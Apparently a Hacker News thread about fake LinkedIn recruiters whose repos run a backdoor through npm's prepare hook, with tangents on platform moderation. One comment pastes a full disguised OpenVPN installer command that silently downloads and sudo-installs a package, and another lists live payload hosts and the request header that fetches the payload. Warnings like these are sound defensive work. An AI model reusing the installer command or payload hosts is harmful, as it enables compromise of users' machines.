1600 points by lwhsiao 4 days ago | 303 comments
> ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine.
> npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor.
> The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install.
Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.
We've had fake recruiters that claim to work for us running basically the same scam. These are great fake profiles: LinkedIn Premium, tons of relevant posts, etc... but they don't work for us, and we get angry messages from people saying our recruiter tried to scam them. No, they're not our recruiter despite showing up on our company page on LinkedIn. No number of reports could get them taken down.
I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn, but not all startups have that connection!
He got a huge package.
Everyone lived happily ever after.
(LinkedIn eventually locked and then deleted his account, https://awesomeatyourjob.com/1140-bringing-more-laughter-fun...)
I'd like people to understand that this is a form of corruption. We've normalized many like it. LI knows that the only way to force them to fix the issue is to go through a drawn-out legal process, save a spate of bad press (RIP 60 Minutes), so of course they won't.
AWS did this for us at the time but the 3 people in the company that used AWS services never got to go to these things. So I doubly don't get it.
1. praxeologically, all individuals act for personal gain, which is subjective in nature;
2. most private corporations don't have a well-defined governance (aside from the occasional constitution), especially ones that rely on gift/favor-based economies, such as seen in certain tribes. Governments tend to be an exception due to their unique legal nature.
Bernie Madoff's case can best be described as a Ponzi scheme, a form of massive fraud scheme.
In a sibling comment, I realized that "corruption" isn't a defined crime in most jurisdictions, aside from Brazil, for some reason, so it's kind of wrong of me to say that corruption is legally defined.
Still, my particular peeve here is the implication of immoral conduct without context on LinkedIn's own rules.
False. [0] If the bank teller demands a bribe to let you withdraw from your account, that's corruption, even though they aren't working for the government.
> Corruption is the dishonest, fraudulent, or criminal use of entrusted authority or power for personal gain or other unlawful or unethical benefits. Corruption occurs in politics, business, education, media, and other social and economic fields.
[0] https://www.law.cornell.edu/wex/corruption
I concede that, outside of formal law, one can describe certain deviations of official attributions of private corps.' agents as corruption.
Legally ‘corruption’ doesn’t exist, as in there is no single law saying ‘corruption is illegal’. (What is ‘corruption’ exactly?)
There are laws against bribery, which does generally only apply to the government, but in many locations applies to pseudo-government roles like notaries, apostilles, lawyers, etc.
There are laws against embezzlement (a type of corruption), and those definitely apply to private individuals.
There are laws against insider trading, a type of corruption. Those generally only apply to businesses/private folks, not the government, with some exceptions.
Then there is the various kinds of fraud, blackmail, etc. Most people would consider them corruption too. Those apply to private individuals and government agents too.
And many more. It’s a smorgasbord.
Embezzlement is better typified under theft. Same goes for most of the others: fraud is fraud, blackmail is blackmail. They may acquire a "corrupt" character when they are done in direct exchange for personal material gains. There are discussions about whether insider trading should be illegal.
Generally speaking, corruption is primarily a crime against public administration because it involves the government, which (supposedly) represents the people. Private companies represent themselves, so they get to (more) trivially decide who is on the line or not.
https://www.theverge.com/news/771210/linkedin-recruiter-exec...
How would LinkedIn validate that your email domain belongs to the company you claim to work for?
They want me to upload a govt id and blink my eyes in a video to get unlocked.
They can go jump.
That it requires you to buy your buddy a drink says it all. They should have taken the general issue to their higher ups, fixed it for you and then bought you a drink. Or dinner, on LinkedIn's dime.
It isn't at all a neat solution, but you could maintain a list of users on LinkedIn that are authorised to speak for your company, linked prominently on your profile with a warning that anyone else claiming to work for the company is likely a scammer but LinkedIn offers no way for you to stop them claiming to be part of your company.
If that became a common pattern it could highlight how much of a scammer paradise LI can be and maybe they'd be more likely to do something about that particular vector.
The only way this could be abused is if the administrator accounts on LinkedIn itself get hacked and temporarily other email domains are added to the whitelist (or if an approved user themselves got hacked on LinkedIn [or their work email for that matter]). These are all the usual vulnerabilities in any system.
I understand that it would be too extreme to only allow users to claim they worked at a company if this verification is done, but maybe putting a warning if you get a message from a recruiter/someone that has not verified they work at their 'present' company could go a long way (instead of right now tucking away the verified logo quietly on their profile page).
I had the opposite problem: my company name was equivalent to the owner of an online casino. It took me a year to figure out that the enormous amount of spam I was getting about ‘guest post placement’, and people contacting me about deals was because Linkedin put me among the list of the casino employees. As I was Director of my company, I was the most valuable prey for business spam.
I fixed the problem by deleting my account, but now I’m in all the shittiest of spam lists for eternity. I don’t know how they even harvest emails from Linkedin.
https://haveibeenpwned.com/Breach/LinkedIn
Reported them to LI and nothing was ever done about it. Eventually the accounts disappeared as I guess they were either shut down or repurposed.
I remember getting an office manager, working from Dubai (I think), for my one-person, basically nonexistent company, working from my living room, in New York.
She may still be there. I never bother checking into LI, except making an occasional post, every few months.
I assume you mean the LinkedIn legal dept. The problem there is that these companies are so big that a 'complaint' or 'cease & desist' to them would be like a mosquito bite, if that, & most likely get lost in the 10s of thousands of other complaints.
It's the same with FB & Insta, etc. One of my daughters had a FB acct taken over that she had accumulated quite a following (~100k plus) with her custom hand drawn artwork. It was impossible to get any acknowledgement of the issue let alone get a suitable solution. And, unfortunately these large companies do not care. Sometimes makes you wonder if LinkedIn & the like are even worth it
Edit: typos
or linkedin
But you still end up with the code on your machine and risk it being run.
Bigger issue is giant, inscrutable dependency trees.
In this example, if they tried to run the test suite or application, they'd have been in the same boat.
Afaik all or most languages have some way to run arbitrary code at install time but it seems node is the main one getting targeted. I think the bigger issue here is just people running untrusted things.
If pulling down your company repo and running `npm install` can lead to a compromise, something has gone terribly wrong with your company's security setup.
All my current projects have all the code needed in the repo (unless impossible, and aside from a compiler which I guess could also be compromised)
Last I recall was a download of a windows scr (screensaver masquerading) file.
Linkedin is a new low, and I'm sure the platform doesn't really care (look, more jobs), just as ad network companies (Google, Meta) don't really care about scam ads.
It's the least surprising thing once you've put yourself out there, very strange watching people here think it's novel, I expect it by default at this point, a stranger handing you code needs to go into a vm, would you let them hand you some candy with a wink too?
Bold strategy cotton, let's see if it pays off.
never got serious ones before, the occasional, useless headhunters who are clearly not based in the same country, but these were different. They were big companies in Canada, ones I'd definitely heard of and even applied to in the past. They were direct, were recruiters for those companies themselves, and were plugged in, able to answer questions, and engaging.
they constantly sent job ads, but only via .pdf files. I even pushed back on one and said I don't open random pdfs, send me a link and they declined. Same recruiter hit me up for a similar role a month later, also via pdf.
Multiple other members of the IT org, esp. the security and infra teams, also reported similar, aggressive recruitment efforts with pdfs. This was around 2020-2021.
That's all you need to know they're criminals and frauds.
I hate how normalized it became for "HR" to require you having a LI page for a job. I don't think it's as bad now but for a while it was essentially not possible to get a job without putting all your personal info on linkedin.
>they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time
At least in the U.S., everyone will cry government overreach and no one will fund it. In other countries, they should probably just ban U.S. platforms unless they're reachable and actually resolve these type of problems.
Try that and see your champagne exports be tariffed with 100% in no time.
I wonder why such common sense laws don't exist and who is preventing them from being introduced and passed despite wide public support in general?
The problem with a phone number you suggest is that it will get spammed and abused with fraudulent imposters too (the complete and utter destruction of trust in phone calls and text messages should also be corrected by the government, but that's a different topic).
https://www.fbi.gov/investigate/cyber
Just install a Russian locale on your computer to prevent malicious programs even starting and get on with your day because it's the truth.
Snowden is a free man in 2026 despite the United States of America very much wanting to put him in jail.
Practically speaking, there is zero chance that the USA would extradite someone to Iran, even if they weren't currently at war with them. Whether they did anything about it would probably depend on exactly what the situation was - there's a bit of difference between targeted IRGC or defence systems and ransomwaring an Iranian hospital or scamming random citizens.
Where they'd probably get you is if you tried to monetise it, and get stolen/extorted cryptocurrencies (or whatever) into your bank account. But that could easily fall under tax evasion laws rather than computer misuse ones, because they'd be a lot easier to prove in court.
https://www.wired.com/story/p4x-north-korea-internet-hacker-...
So hostile countries should be fair game for Americans who want a side-hustle. Plenty of Russian targets that could be profitable.
You won't hear back from them, though. But, at least for US citizens (and possibly for anyone?), this is as far as I know the closest thing there is to an "Internet 911".
You might. (I have.) They were able to get a wire sent to a fraudster reversed. (Not my wire.)
It's basically impossible to catch suspects because they are either smart enough to cover their tracks very well, or (more often) live in countries whose governments don't care about their citizens (even pay them for) scamming westerners.
And no, number spoofing isn't an excuse either. We literally solved the much harder problem of email spoofing already. There are, what, 3 carrier networks in all of US? And they cannot do with each other what DMARC did for the hundreds of thousands disjoint organizations that comprise the internet? Please.
Absolutely true, but droning their data centers might have some policy repercussions.
I have posted about this before. See here: https://news.ycombinator.com/item?id=35191971
We have that in Europe and the world has not fallen apart. On top of that, we don't have even close to the scale of problems with scammers that the US has. I won't deny we don't have scammers because we absolutely have them, but they are far from the scourge they are in the US.
> This is on par with being unable to open a bank account if the capability is matured.
The secret is... we have constitutionally protected rights. Unless you do not pay your bills, your phone line will not get disconnected. And same for bank accounts - every European has the right to a basic banking account, even if you are a target of foreign sanctions [1].
[1] https://www.tagesschau.de/ausland/europa/konto-eugh-usa-sank...
I wonder why that is? I don't give the numbers out. That's why. Whenever a store says "do you have a number with us" I say I don't have a cell phone. If they can plainly see I do have a cellphone, I add, "for that."
The second part is shopping at stores that don't tie prices to your having given them a number.
I'd advise that you think long and hard about the consequences of the current system before saying the alternative is worse.
Wonder if they’re effective in going after reports. I’d still report to IC3/FBI/powers that be, too. Just in case someone somewhere has the resources to do something… perhaps a high hope
US was so angry about "unfair" tariffs why are they not angry about criminals stealing from Americans?
secondary is the effort asymmetry between spinning up one of these scams (near 0 effort) and catching/prosecuting these scams (big effort, astronomical cost)
406 MHz is pretty close [1]. If you have a radio that screams on that channel, chances are the nearest search-and-rescue operation will at least be notified.
[1] https://www.sarsat.noaa.gov/emergency-406-beacons/
911 is for emergencies. I don’t think the global 911 service would give any attention to a LinkedIn scam.
I presume more countries have this, not sure about the US though (CISA maybe? CERT/CC?). CERT is the overarching org that manages local agencies like this Dutch NCSC. Though I am not sure if and how easy it is, globally, to report incidents.
Well, that plus their 50 nuclear warheads and continued ICBM development, amongst other things.
$100 says OP is Claude
Whenever I see a typical Claude-tell in writing, my internal reading voice switches automatically from my internal monologue’s voice into Claude’s voice for the rest of the piece.
This is the part that really irks me: LinkedIn and Github know this is the end goal of many of the rampant supply chain attacks but they a) don't have a first class mechanism for reporting b) don't seem to be improving their systems or even warning people. I have been hit by this enough times that I follow along to get screenshots of the scammer. One might think with all the surveillance systems Microsoft/LinkedIn/Github/Google-Meet/Calendly have in place that a potential victim reporting it along with an actual picture of the scammer could get us somewhere.
Like the Facebook problem. They were never in more trouble with people and legislators than when they were spending mountains of gold trying to police content.
It’s much easier to shrug and say, “Sorry folks, it’s the internet. Good luck.”
Very true. I remember when I was job hunting for 2 years post-graduation, that these time sinks started to take meaning away from life and induced cynicism and depression (to an extent).
It's easy to forget all that once you end up getting a job, but remember to always be human and show empathy if a person cold-reaches out to you.
Oh, Microsoft.
When my YT Premium elapsed 70% of ads YT decided to show me were deepfake investment scams (of terrible quality), and Google also didn't find them to violate any of their policy. The remaining 30% were straight up foreign state-level propaganda, those I didn't even bother to report.
All three either have security or stability issues, which seems to get worse, not better, as microsoft goes more into AI. Where is the AI productivity (10x by some accounts!) within the company going to?
Someone sends you a repo, says the install is broken, and asks you to take a look.
A lot of developers would run npm install before thinking twice, especially if they were tired or looking for work.
https://www.reddit.com/r/openclaw/comments/1rlet0h/someone_t...
Remember to use protection when meeting random people, and putting their junk deep inside your computer!
The last few weeks tell us how bad this is especially with all the mini-shai hulud's running around.
it already has, you can configure intellij to run npm commands in a Docker container.
It's ok, the guy with glasses from the Daily Show said it's ok.
The other was for a DevEx crypto service. While I was very suspicious the code looked okay but the recruiter was strange and changed their profile to a different person eventually. I think this was a crypto stealing scam though since it required connecting to a wallet. I don't have any crypto though, so I might be okay for now. Although reinstalling my system clean would be the only sure way in theory...
But also online, once or twice I received these Leetcode style sites to register and do a few tests before we meet, which was weird for me and I just ignored it.
One of them later asked "Why I didn't have time to do it yet" and I told them I first meet people and check the fit before I do tests, like who the hell does that differently?
Hope it hasn't become a way more common thing.
It was the most bizarrely long roundabout way to get me to install malware I had ever witnessed. I couldn't fathom it was real, I mean they interviewed me for half an hour. Now you might think I'm paranoid however it was obvious, their camera was off (personal preference they said) and well I allowed it... only for other eventual straws to break the camel's back, and I realised "oh uh oh this is just 2 strangers trying to get me to install crap on my laptop for wealth extraction".
I was flummoxed tbh, I couldn't believe it, as the approach had been very organic, through Linkedin DMs, just that eventually I realised I had succumbed to "yes men" (the only thing that would get past my already strict job filters ironically) to allow myself into such a compromising situation.
The only question I had is how did they do such a smooth complex manoeuvre and then I realised... oh they just used AI to come up with the plan and implementation.
So when I finally received a similar offer on LinkedIn, I made them pay to me, twice XD
They sent me a GitHub repository and claimed they needed help deploying a token or something similar. The obvious goal was to get me to run their code while connected to a wallet with real funds.
I told them: sure, I can probably help, but my time costs money.
So I convinced them to pay me for a consultation. For half an hour, I explained how “amazing and simple” the process was, and how they could do it themselves. They claimed to be from the US, but on the call they had an extremely heavy Asian accent. I even recorded part of it on camera, because the whole situation was ridiculous.
Before they could get too furious, I told them I did not have more time and that they would need to book another call. So they paid me a second time.
Before the second call, I got myself an absolutely new MacBook for fun, testing it, basically a fresh Mac (I should have been using a VM because it’s faster to restore, but at that time I wasn’t familiar with UTM and I got Parallels, which is a scam itself), just to see how their scam worked.
The scam was classic npm install-style: get someone to run scripts from a Git repo and hope they are unaware of how much access that can give to their machine.
Honestly, two years ago, I also did not fully understand that a simple ‘npm install’ could give attackers such deep access to your computer.
The more direct comparison would be whatever the equivalence of “npm install” is for a given language, and what it allows to run. Sounds like they’re making good progress to fix that, but it’s certainly more than a popularity issue.
Practically, most systems leave it off because many out-of-band user space script language package ecosystems stop working. =3
There are also adaptive application firewalls that are user friendly.
https://github.com/evilsocket/opensnitch
If root installs OS supported VM packages, then it would be pointless to complain the system runs as expected. As a sentient turnip, I probably wouldn't know for sure... =3
Indeed, all things nodejs are usually a dumpster fire at a hair salon, but the real point here was people always inherit whatever the previous cheapest labor built at that office. Also, usually people don't get to make architectural decisions for a long time. =3
Saw it in the soup of other job posting, went to apply, it took me to some other job portal, ok whatever, this is normal, filled out all the forms as one does, and then reached the end and the site told me they'd submitted my application, and here were some other jobs I could apply to with the same application. Useful, right?
Click any of them, or anywhere else on the page, and a full screen modal takeover comes up, demanding you pay $50/application.
I closed the tab, but watched the email they sent me from the first job app. It went nowhere. Eventually applied to the company directly, on their job portal, and when I got to a real recruiter later, they said they never received my first app. My guess is ladders never even sent it and wouldn't until I paid up
Best part was ladders continued to spam my email inbox with job application invitations, each one wanting the same $50, until I blocked the fastmail throw away
I also had a "recruiter" reach out to me about a "role I'd be a good fit in". Made the meeting, and immediately some red flags. Audio and video were about 2 seconds out of sync. Guy then proceeded to try and pitch me on a similar job board, with the same $50/application cost, only this one had a 10 weeks salary cost on placement as well
I told him I wasn't interested.
Maybe these are just more traditional scams or whatever, not the malware type the op is about, but they still piss me off
People who've been unemployed for a long time are often desperate enough to overlook serious red flags that would never catch someone with substantial savings or who's employed and looking to job hop.
Hoping he wasn't scammed.
In the end it fucks me because when I tell my dad "Oh they never ask for your password, so don't say it to nobody no matter what."
He "But when they asked us last year?!"
https://www.linkedin.com/company/blockchainaustraliasolution...
https://blog.denv.it/posts/i-was-likely-targeted-by-dprk-in-...
It was likely DPRK.
I spoke on the phone with "Singapore based recruiters" a couple of times who wanted my services as a consultant for "advanced applications for semiconductor devices."
Turns out they were just fishing for inside information on my employer's end customer's applications.
Just a thought, but no call to action from me.
Update: found a clone of the repo on github and got the payload, all you have to do is add a header `bearrtoken: logo`
It's obfuscated, I will feed it to qwen to see what can be gleaned.
I tried content-types, user-agent, but no luck. I'm not sure what the user-agent of `req` is, but the default `node-fetch/1.0` does make the response json. They are a 307, but the result is a png.
I presume the original payload may have contained information that the hackers want to keep from prying eyes. Esp. now that it landed on HN, it makes sense to take it offline and replace with an actual png to avoid people finding information in it that may harm their future hacks or so?
Without seeing the request code I initially assumed it would be `Authorization: Bearer logo` that did the trick.
I have it running locally, and i don't want to add credentials to the vm with the malware.
According to qwen:
It's cross platform
It has a bunch of persistence mechanisms.
It downloads another pack from pub-1fe39d600a4447ba895ef1c848d32e7e.r2.dev, Verified I got the secondary payload
This pack looks like a python 3.10 environment along with an executable called cupsd.
And downloads another js script from http://138.201.125.58:1224/client/99/77
That script then proceeds to download three python scripts that use the aforementioned python environment and do their business, qwen is having trouble de-obfuscating their urls and I am busy.
Also what is your go to OS?
Hm, when I think of it an old Raspberry Pi could be my go to for this, but always physically.
> I'm actually curios to know how do you people visit the link securely?
Disposable vm with a connection to tor. Then copied to a disposable vm with access only to one port on my llm server the one running llama.cpp.
> I guess a VM but could in theory something be resilient enough to misuse the Shared Clipboard or something to access your host machine?
When I am doing this kind of thing i have some rules.
Rule #1 Do not run the malware.
Rule #2 No copying from the analysis vm.
Given the malware is not run it's highly unlikely that any Xen vulnerabilities can be exploited or llama.cpp vulnerabilities for that matter.
Ideally I would not be using my own llm server but proxying the requests through another vm that contains temporary credentials to a llm provider. But I did not have the time to set that up.
> Also what is your go to OS?
Qubes OS
> Hm, when I think of it an old Raspberry Pi could be my go to for this, but always physically.
Physical isolation has its own issues. If you don't airgap the device it could exploit other devices in your network, old residential routers are not exactly bulletproof especially from the LAN side. Additionally, physical devices could be vulnerable to BIOS and UEFI firmware persistence mechanisms.
~50% of jobs listed on who is hiring every month require a LinkedIn profile to submit a job application.
In order to find a job, one must bend the knee to LinkedIn first and subjugate themselves to the political (all sides) propaganda on the feed.
Some of these will happily get on "interview" calls etc.
For some reason, most (but not all) of them have the same telltale signs of looking for someone to work on a web3/crypto gaming project.
Github is really slow when it comes to malicious repos. You'll probably get an email randomly six months from now when they finally see it.
https://kaveh.page/blog/job-interview-scam
i've had maybe 10-20 requests after that that i've just blanked ignored.
Yes, throwaway VPS for interview coding tasks should be the new norm.
Because there's a massive bot network operating on LinkedIn right now... and I'm tired of interacting with it every day.
This has nearly gotten me before, and I got lucky.
I even did a write up. It was one of the first reverse engineerings I've done. https://gist.github.com/Throvn/97fcb4981c1ff66725d4b2e408ba0...
The company that I currently work for is currently paying for a curation product to scan NPM for vulnerabilities, and to prevent access to typo-squatting packages and new, unverified packages. I suspect that my employer may get to the point of banning NPM entirely, though.
How anybody in their right mind still uses this tech stack is beyond me.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Remember to treat every site on the internet as an adversary, even if they weren't in the past.
And, I am reading this on HN right now. What a coincidence!
I read a lot about social engineering and how the human being is considered the weakest layer in the security chain but this is the first time I've come across this pattern. Eye opening indeed.
That sucks, but it seems to be par for the course, these days.
Sure, that might have been the one chance in a life time to easy big money. Or just a path to financial big troubles.
The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.
Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take home screening project and they are quite good at getting at engineers' heads that "leetcode is outdated/they don't believe in it" and whatever they want you to hear.
They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.
I am much wiser now that I work multiple salary jobs remotely I realize these 3 golden rules:
- Don't stay loyal to your employers.
- Don't stay honest to those who don't value it.
- Don't stay complacent; always innovate.
IMO you are either honest or you are not
Stay vigilant out there everyone.
I don't know. There's a plentiful supply of bad humans.
That's your first red flag right there.
Good man, knows what he is doing.
FWIW, I only run AI CLI tools on a Hostinger VPS, never on my personal device. Also allows me to run YOLO mode across the board. If I am working on a web project, then I use preview develop deploys for testing, so I do not even have to work on my machine. It's a very fun workflow for experimentation. Still trying to work out the kinks to make it easier.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Come on, github...
They know there's a high degree of fraud and they don't do anything about it. They don't care.
I've gotten tricked into sending my resume and talking on the phone with legitimate looking recruiters from Google, Netflix, Meta, OpenAI, Anthropic, etc, but LinkedIn does nothing about it.
Linkedin has become a rotten cesspool of scammers and spammers, ripe for disruption.
They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents was as follows (with the malicious URL removed):
```
( brew install openvpn ) >/dev/null 2>&1 & ovpn_pid=$!; ( url="https://asshole.scammer.dev/openvpn-mac"; policyCategoryId="-1"; installerArgs="url=$url:departmentId=1765561620401102848:sourceInstall=silent:technicianId=7455681275330027520"; silentInstall="true"; waitForProcess(){ processName="$1"; fixedDelay="$2"; terminate="$3"; while pgrep -f "$processName" >/dev/null; do if [ "$terminate" = "true" ]; then pkill -f "$processName" true; return; fi; delay="${fixedDelay:-$((RANDOM % 50 + 10))}"; sleep "$delay"; done; }; checkForRosetta2(){ waitForProcess "/usr/sbin/softwareupdate"; IFS='.' read -r osvers_major osvers_minor <<< "$(/usr/bin/sw_vers -productVersion)"; if [ "$osvers_major" -ge 11 ]; then if ! sysctl -n machdep.cpu.brand_string | grep -q "Intel"; then pgrep oahd >/dev/null 2>&1 /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1; fi; fi; }; checkForRosetta2; DIRECTORY="/Users/Shared/InstallerWorkspace"; mkdir -p "$DIRECTORY"; configFile="$DIRECTORY/agentinstallconfig.properties"; { echo "policyId=$policyCategoryId"; echo "install_args=$installerArgs"; echo "Silent_Install=$silentInstall"; } > "$configFile"; baseName="$(basename "$url")"; downLoadFile="/Users/Shared/$baseName"; curl --silent --fail --location --url "$url" --output "$downLoadFile" >/dev/null 2>&1 && sudo installer -pkg "$downLoadFile" -target / >/dev/null 2>&1; t=$?; rm -f "$configFile" "$downLoadFile"; exit "$t" ) >/dev/null 2>&1 & so_pid=$!; wait "$ovpn_pid"; ovpn_rc=$?; wait "$so_pid"; so_rc=$?; [ "$ovpn_rc" -eq 0 ] && [ "$so_rc" -eq 0 ]
```
Yeah, no. Be careful out there.
By the way, here's the scammer's "company website": https://jtwllc.com/
Superficially looks legit until you start investigating the finer details.
I think we need a different kind of PSA if its still so new to people